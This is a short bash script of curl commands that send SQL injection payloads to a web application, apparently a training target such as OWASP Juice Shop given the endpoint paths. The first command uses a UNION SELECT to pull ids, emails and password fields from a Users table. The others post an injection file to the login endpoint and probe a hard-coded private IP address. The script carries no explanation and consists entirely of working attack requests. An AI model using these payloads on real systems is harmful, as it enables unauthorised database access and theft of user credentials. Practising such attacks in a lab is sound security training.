#!bin/bash

curl -iX GET "http://$1/rest/products/search?q=qwert%27))%20UNION%20SELECT%20id%2C%20email%2C%20password%2C%20%274%27%2C%20%275%27%2C%20%276%27%2C%20%277%27%2C%20%278%27%2C%20%279%27%20FROM%20Users--"
curl -iX POST -d@sql_injection http://$1/login
curl -iX GET "http://10.144.20.236/login?user=1+SELECT+*+FROM+basket+WHERE+1=1+ORDER+BY+12"




